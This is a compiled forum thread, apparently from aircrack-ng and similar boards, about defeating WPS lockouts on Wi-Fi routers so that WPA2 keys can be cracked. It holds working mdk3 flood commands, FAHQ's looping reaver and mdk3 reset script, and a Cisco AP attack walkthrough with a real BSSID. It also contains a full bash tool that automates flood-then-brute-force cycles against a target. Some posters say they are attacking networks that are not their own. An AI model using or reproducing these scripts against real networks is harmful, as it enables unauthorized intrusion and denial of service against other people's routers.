Have you tested it yet?
We posted the matter of resetting routers in the aircrack-ng forums and got the following:
http://forum.aircrack-ng.org/index.php/topic,468.0.html
madafakaz
Newbie
Re: Resetting Routers Remotely
« Reply #3 on: January 18, 2014, 08:35:57 am »
--------------------------------------------------------------------------------
Your success with this really depends on the router manufacturer and hardware used.
I have successfully managed to reboot a TG782i router, but only when connected to its wifi.
If you are interested in exploring this, the process involves running a couple of concurrent nmap scans. I usually open 4-5 terminal windows and run nmap -v -A xxx.xxx.xxx.xxx
Once the basic scans are done and the nmap script engine launches scripts against the router, it freezes and restarts. Sometimes it's necessary to repeat the process a few times, but if you could narrow down the script that does this it might be useful to try to forge a packet that could be sent in monitor mode.
The mentioned router uses a crappy Broadcom chipset and it's very likely other Thomson/Technicolor models are vulnerable to this bug.
Sorry if I should have started another thread, but I have a real basic question about the mdk3 whitelist. I know I am to type
Code:mdk3 mon0 d -w <filename>
Does this mean that I type the path to the filename, or does this file already exist and I just add the MAC addresses to it? If so, where is this file?
I typed a path to the file that I created, but it was not found.
Sorry for the n00b question.
Hi everyone,
My only question is how do I know if I successfully reset a router or not? Because I do the same thing and everything is fine, but nothing happens for ages. The router won't change from the WPA2 sign to WPA, and the channel doesn't go to -1. What can I do? Because it's not my own wifi that I'm already connected to, so how do I know? Or did I not even reset the router? When can I start the reaver attack?
Thank you
Hi, I can now successfully work with mdk3. The only question I have at the moment is how do I know if I reset the router successfully or not? Because I run mdk3 for ages and nothing happens. The channel won't change to -1 and the WPA2 is not changing to WPA. How do I know when to start reaver??
Many thanks
Thank you! It works!)))
Is it possible to start and stop mdk3 automatically, like reaver (-r x:y)?
Start mdk3 to freeze the AP, wait some time (about 2 min) and start again.
I think if that is possible we can run reaver in a second terminal window to find the WPS PIN (-r x:y). If the AP is LOCKED, mdk3 resets it every 2 min.)))))
Hello ppl,
I tried to test mdk3 on my D-LINK router:
sudo mdk3 mon0 a -a 00:11:22:33:44:55 -m
sudo mdk3 mon0 b -a 00:11:22:33:44:55 -n " name_of_AP" -h -c [no of channel]
sudo mdk3 mon0 d -a 00:11:22:33:44:55 -c [no of channel]
sudo mdk3 mon0 m -t 00:11:22:33:44:55
Then test with:
sudo wash -i mon0 -C
Finally it just froze, and I tried a reset by hand and checked sudo wash -i mon0 -C; nothing displayed, NO LOCKED WPS.
Please, any help ppl?
Thank you for the reply! What should appear with "wash"? What should I see when I open that?
Because when I type wash -i mon0
this is what I can see:
Found packet with bad FCS, skipping...
Found packet with bad FCS, skipping...
Found packet with bad FCS, skipping...
Found packet with bad FCS, skipping...
Found packet with bad FCS, skipping...
And I don't know when I can start reaver to get the WPA2 key. Please help me.
Hi everyone! Thank you for all the replies. I'm really stuck with hacking the WPA2 routers. Now the WPA2 WPS switches to NO (so it's not unlocked) but when I start reaver I still get the "60 second re-trying" thing. Is there anyone who can guide me from mdk3 through reaver to the end? I wouldn't mind using TeamViewer either. I would be very pleased, and more than appreciate it. Any comment or response helps!!!
Hello guys. To soxrok2212: please tell me why my D-LINK won't reset after I test what you wrote in your topic, although I followed all of sudo mdk3 mon0 a -a, sudo mdk3 mon0 b -a, sudo mdk3 mon0 d -a, sudo mdk3 mon0 m -t, and then tested with:
sudo wash -i mon0 -C. It just froze, and I reset it manually, but the "no WPS locked" didn't show. Please, I need help?
Hello All,
Any clue where the original posting went? I was showing a buddy the guide that was written out, but noticed it says content deleted. Does anyone have the original?
Thanks!
Hello All,
Any clue where the original posting went? I was trying to show a buddy the post, but noticed the "Content Deleted" on the original post. Anyone have the original guide?
Thank you very much!! It helped but didn't solve my problem... I used your code and at least I didn't get the "re-trying in 60 seconds" thing, but it is stuck on 0.04% and doesn't want to go further... so it's the same as if it had the 60 seconds retrying..
I'm really confused how I could hack this WPS-locked WPA2-PSK router..
Maybe could you tell me your email so we can talk, or TeamViewer or VNC? Or if you don't want that we can keep messaging here! I don't want to give up:) And thanks everyone for helping!
Just please someone tell me what to do. Maybe I didn't unlock the WPS successfully?
Have a look here http://code.google.com/p/reaver-wps/.../detail?id=167
I haven't read through it myself, but that is the main area for problems related to reaver; or do a Google search for "WPS transaction failed (code 0x02)".
Rab.
Here is what I am using to get around locks...
Code:
while :; do
    echo
    echo "starting reaver..."
    # restore the saved session (answer y) and quit after 5 PIN attempts
    echo y | reaver -i mon0 -b <bssid> -c <channel#> -g 5 -vv
    echo ...
    echo ...
    echo ...
    # 10 s of mdk3 authentication flood against the AP (-m: client MACs with valid OUIs), then stop
    timeout 10s mdk3 mon0 a -a <bssid> -m
    sleep 60    # let the router finish rebooting before looping
done
First off, you need to run "apt-get timeout install" to get the timeout app. After that the script should work. The first part starts reaver, restoring the session and executing 5 attempts before exiting. The second part executes the mdk3 command, which will time out after 10 seconds of running; at this point the router should be rebooting (at least the one I'm trying it on did). Next, put a sleep for 60 seconds to allow the router to reboot, and then the script will loop back to the beginning.
Hello FAHQ, please, please explain more: how do I put in the commands?
Hello, is there any help from you, FAHQ?
Hello ppl, is there any trick to unlock a locked WPS?
Any clue, guys?
Make a blank document in your root folder called reset.sh. Then, open the document in a text editor and paste this into it:
Code:
while :; do echo
echo "starting reaver...";
echo y|reaver -i mon0 -b <bssid> -c <channel#> -g 5 -vv
echo ...
echo ...
echo ...
timeout 10s mdk3 mon0 a -a <bssid> -m
sleep 60
done
Replace the values inside the code with the values of your target. If you don't know what I mean by that, then learn the basics of aircrack and reaver.
When you're done, open terminal and run:
Code:
bash reset.sh
To everyone: another effective method to unlock the WPS mechanism on a WPS router!
Quote Originally Posted by repzeroworld
TO: EVERYONE - EFFECTIVE WAY TO RESET A MODERN CISCO ACCESS POINT BY FLOODING FOR 10-20 SECONDS!
I have found a way to effectively flood a new model (manufactured in 2012/2013) Cisco router to make it reboot with WPS locked
status as "NO". Also I will prove that using Authentication DOS mode flooding has no effect on THIS router!
DETAILS OF THIS ROUTER
From one of the M1 EAP packets captured from my wireless card, details of this router are as follows
bssid c8:d7:19:0a:bf:35
Manufacturer: Cisco
Model Number: 123
Serial Number: 12345
Model Name: WAP
Channel type: 802.11g (pure-g) (0x00c0)
I did some research using these details and found out that this access point was modern in age.
Behaviour of this CISCO Router
This type of router is not affected by a script changing your MAC address. Also, if you try 3 PINs the router starts
an exponential clock that rate-limits another couple of PIN tries by reaver, and then the router totally locks itself for one or two days;
even if I gave reaver the option to try 1 PIN every 3 minutes (worthless), after a couple of PIN attempts it locks up for one/two days.
I will release my method for sure.. give me a couple of days for a nice video presentation!
EFFECTS OF USING MY METHOD
I haven't seen anyone discussing the method which I am going to reveal, but it involves using mdk3.
After using my method the router reboots and it needs some time to "thaw off" before sending EAP again... this is roughly around
a couple of seconds. If you don't leave it to thaw off and use the reaver command, you will receive a lot of EAP timeout messages before
the router catches itself, but it is worth it rather than waiting for days for the router to unlock itself!! Also, it hops to another channel when it reboots, so it
is not wise to run reaver with a -c flag... I suppose this COULD be part of Cisco's security mechanism feature..
ANOTHER EFFECTIVE WAY TO REBOOT A WPS ACCESS POINT AND RESET WPS LOCKED STATUS TO “NO”
THIS LINK *REMOVED* HAS A VIDEO I HAVE DONE TO SHOW HOW I USE THE TWO ATTACKS AND WHICH ONE WAS MORE EFFECTIVE WITH THIS PARTICULAR AP.
BRIEF NOTES
I focused on the stated Cisco Access Point that I came across with the new exponential WPS mechanism.
THE TWO ATTACKS I USED ARE:
1. MDK3 Authentication DOS Flood Attack - floods the AP with too many fake clients so that the router is overloaded
2. EAPOL Start Flood Attack - authenticates to the AP and sends too many EAPOL Start requests so that the router is unable to respond to the volume of EAPOL requests and reboots itself.
MDK3 AUTHENTICATION DOS FLOOD ATTACK
This attack is useful on SOME routers. The important point to note is HOW I USE THESE ATTACKS!
(I have three wireless adapters, AWUS036NHA, AWUS036NH and TP-LINK 722N, and I use the AWUS036NHA and AWUS036NH to carry out this attack numerous times)
HOW I ATTACKED THIS ACCESS POINT USING AUTHENTICATION DOS FLOOD ATTACK
I started my wireless cards on three monitor interfaces, mon0, mon1 and mon2.
In three terminals, I use the command line
mdk3 mon0 a -a C8:D7:19:0A:BF:35 #TERMINAL 1
mdk3 mon1 a -a C8:D7:19:0A:BF:35 #TERMINAL 2
mdk3 mon2 a -a C8:D7:19:0A:BF:35 #TERMINAL 3
Note:
I ensured that the router was WPS locked permanently so that I could test the effectiveness of the attack. Also, a point to note: I did not use one command line with one monitor interface since it was futile. I blasted the router on three monitor interfaces! Now I am blasting away at the router for hours! After blasting away, the Access Point is still locked! I tried this attack for days to convince myself!
MDK3 EAPOL START FLOOD ATTACK
I started my wireless cards on three monitor interfaces, mon0, mon1 and mon2
mdk3 mon0 x 0 -t C8:D7:19:0A:BF:35 -n Riznet -s 100 #TERMINAL 1 (SEE VIDEO FOR REASON FOR USING THE -s 100 FLAG)
mdk3 mon1 x 0 -t C8:D7:19:0A:BF:35 -n Riznet -s 100 #TERMINAL 2
mdk3 mon2 x 0 -t C8:D7:19:0A:BF:35 -n Riznet -s 100 #TERMINAL 3
Note: I tried again using 1 monitor interface to carry out the attack, but it took hours for the router to reboot and I was not sure if the attack was the main reason for the router rebooting! In this scenario I tried blasting the router in three terminals. This "Shock Attack" method ran for about 20 seconds and the router rebooted with WPS locked status as "NO". I TRIED THIS ATTACK A COUPLE MORE TIMES FOR ABOUT 20 SECONDS WITH THE ACCESS POINT REBOOTING AND UNLOCKING ITSELF (WPS)!! Also, packet analysis significantly helped me to understand the connection between EAPOL and a router's behaviour towards open authentication requests, which makes it impossible to stick to one method for flooding ALL APs (see the video link above).
BASH SCRIPT WRITING
Soon I will write a bash script to execute all the steps in my video (I need time to chill...).
OTHER ACCESS POINTS INVESTIGATED
I have also assessed the behaviour of three other Cisco access points that rate-limit PINs in a systematic way but did not lock up in an exponential manner! I will give an update if I do come across any other access points that behave somewhat differently. Do share your experience in relation to any new updates on WPS!
Your approach is both novel and intriguing. Those involved with the matter of resetting routers remotely should study this closely.
We realize a successful WPS reset is dependent on a number of factors, including router make, signal strength and clients associated, just to name a few. However, Musket Teams will attempt to duplicate your results; we will only report if we are successful.
Hello, hello friends. Thank you so much soxrok2212, you are a great guy, I am so grateful for your help.
TO: EVERYONE - THREE OTHER ACCESS POINTS THAT WERE DEFEATED BY THE MDK3 EAPOL START ATTACK!!
I have underestimated this attack! IT WORKS ON ALMOST ALL THE APs THAT I PICKED UP THAT HAVE THE WPS RATE LIMITING FEATURE..
Although some APs refuse to accept too many EAPOL packets, once mdk3 authenticates it floods the AP quickly until a deauthentication
packet is sent from the AP to break the connection.
FOR FURTHER PROOF CHECK ANOTHER VIDEO POSTED ON MY CHANNEL
LINK *REMOVED*
Also, instead of running three attacks in three terminals, I used one terminal to carry out three attacks RUNNING AT THE SAME TIME using
EXAMPLE
Code:
timeout <seconds> mdk3 mon0 x 0 -t <bssid> -n <essid> -s <no. of packets/sec> &
timeout <seconds> mdk3 mon1 x 0 -t <bssid> -n <essid> -s <no. of packets/sec> &
timeout <seconds> mdk3 mon2 x 0 -t <bssid> -n <essid> -s <no. of packets/sec>
PENDING: I AM CURRENTLY WRITING A GENERAL INTERACTIVE BASH SCRIPT TO CARRY OUT ANY MDK3 ATTACK USING MY METHOD WITH REAVER! I WILL POST ONCE FULLY FINISHED. IF ANYONE HAS A SCRIPT FOR REAVER AND MDK3 (TO CARRY OUT ANY ATTACKS) DO SHARE SO THAT I CAN COMPARE IT WITH MY WORK-IN-PROGRESS SCRIPT!
I have finally finished a script that took me a couple of days to complete. I would be grateful if others could test it out. What the script does:
1. It asks the user for information on the target
2. It runs reaver and waits until reaver detects the AP is rate limiting PINs
3. When the AP is 'rate limiting PINs', the script pauses reaver and floods the AP for a time you choose
4. After flooding, it detects if the AP is still rate limiting PINs; if it is, then it continues to flood the AP until it unlocks itself
5. Once WPS is unlocked, the script continues reaver
Those interested in testing can send me an email or a private message on my channel.
*REMOVED*
cheers!
The script is also shared through torrent but it takes a while to upload. The link below is the location of the torrent
http://www.legittorrents.info/index....&page=torrents
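FAHQ's reset.sh above floods on a fixed timer, while repzeroworld's five-step script floods only while the AP is rate limiting and re-checks before resuming reaver. The bash script below is an added example, neither FAHQ's loop nor repzeroworld's script, that combines the two ideas: each round it reads the target's "WPS Locked" flag and current channel from wash, floods with mdk3's EAPOL-Start mode (x 0) from several monitor interfaces in parallel only while the flag is "Yes", and otherwise hands the current channel to reaver. It assumes wash prints the reaver 1.4 column layout (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID), that `timeout` is the GNU coreutils one (on Debian/Kali it is part of coreutils, not a separate package), and that the mdk3/reaver flags are the ones used in this thread. The wash listing at the bottom is constructed for the dry run, not a real capture.

```shell
#!/usr/bin/env bash
# Added example (not FAHQ's loop or repzeroworld's script): pin with reaver while
# wash reports the AP unlocked, flood with mdk3 EAPOL-Start (mode x 0) from several
# monitor interfaces while wash reports "WPS Locked: Yes".
# Assumptions not taken from the thread:
#   * wash columns are "BSSID Channel RSSI WPS Version WPS Locked ESSID" (reaver 1.4),
#     so the channel is field 2 and the lock flag ("Yes"/"No") is field 5;
#   * `timeout` is GNU coreutils' timeout;
#   * the AP may hop channel after a reboot, so -c is re-read from wash every round.

# ap_state <bssid>: reads wash output on stdin and prints "<channel> locked",
# "<channel> unlocked", or "unseen" when the BSSID is not in the listing.
ap_state() {
    awk -v b="$(printf '%s' "$1" | tr 'a-f' 'A-F')" '
        toupper($1) == b { print $2, ($5 == "Yes" ? "locked" : "unlocked"); seen = 1; exit }
        END { if (!seen) print "unseen" }'
}

# eapol_flood <bssid> <essid> <seconds> <iface>...: one mdk3 EAPOL-Start flood per
# interface, all in parallel, each killed by timeout after <seconds>.
eapol_flood() {
    local bssid=$1 essid=$2 secs=$3 ifc
    shift 3
    for ifc in "$@"; do
        timeout "${secs}s" mdk3 "$ifc" x 0 -t "$bssid" -n "$essid" -s 100 &
    done
    wait
}

# attack_loop <listen-iface> <bssid> <essid> <flood-iface>...
attack_loop() {
    local mon=$1 bssid=$2 essid=$3 state ch lock
    shift 3
    while :; do
        # 15 s of wash (-C ignores bad-FCS frames) is enough to see the AP's WPS IE
        state=$(timeout 15s wash -i "$mon" -C 2>/dev/null | ap_state "$bssid")
        if [ "$state" = unseen ]; then
            echo "AP not seen (rebooting or out of range), waiting..." >&2
            sleep 10
            continue
        fi
        ch=${state%% *}
        lock=${state#* }
        if [ "$lock" = locked ]; then
            echo "WPS locked on channel $ch: flooding 20 s, then letting it reboot" >&2
            eapol_flood "$bssid" "$essid" 20 "$@"
            sleep 60
            continue
        fi
        # Unlocked: restore the saved session (echo y), try at most 5 PINs, re-check wash.
        echo y | reaver -i "$mon" -b "$bssid" -c "$ch" -g 5 -vv
    done
}

# Constructed wash output (not a real capture) used for the dry run below.
WASH_SAMPLE='BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
C8:D7:19:0A:BF:35    6      -45   1.0          Yes         Riznet
00:11:22:33:44:55   11      -60   1.0          No          dlink'

case "${1:-}" in
    run)  shift; attack_loop "$@" ;;   # bash wps_reset.sh run mon0 C8:D7:19:0A:BF:35 Riznet mon1 mon2
    *)    printf '%s\n' "$WASH_SAMPLE" | ap_state C8:D7:19:0A:BF:35 ;;   # prints "6 locked"
esac
```

Run it without arguments to parse the embedded sample; run it with `run` and your interfaces on a target you are authorised to test. Re-reading the channel from wash each round is what lets it follow the channel hop repzeroworld saw after a reboot, and the `unseen` branch covers the seconds during which a rebooting AP sends no beacons, which is also the point at which reaver would otherwise print EAP timeouts.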
Wow, I never expected to see this thread reach 50,000 views. I guess it's pretty popular. I'm very doubtful here, but is there anyone who knows how to make a full GUI with all the methods posted by various users here? It would include options of:
1.) MAC changing after a specified number of PIN trials
2.) reaver incorporated, of course ;D
3.) MDK3 auth flood
4.) beacon flood
5.) MIC failure
6.) deauth
7.) EAPOL failure
More??
It would just be nice to have a full GUI for EVERYTHING posted by users here... plus having a few terminal windows open and typing in the commands every time is a bit annoying. I'm not talking about a script here, a full-blown GUI.
I'm doubtful, but the community here is pretty big. And maybe, just maybe, we could get it pushed to be a standard tool in Kali!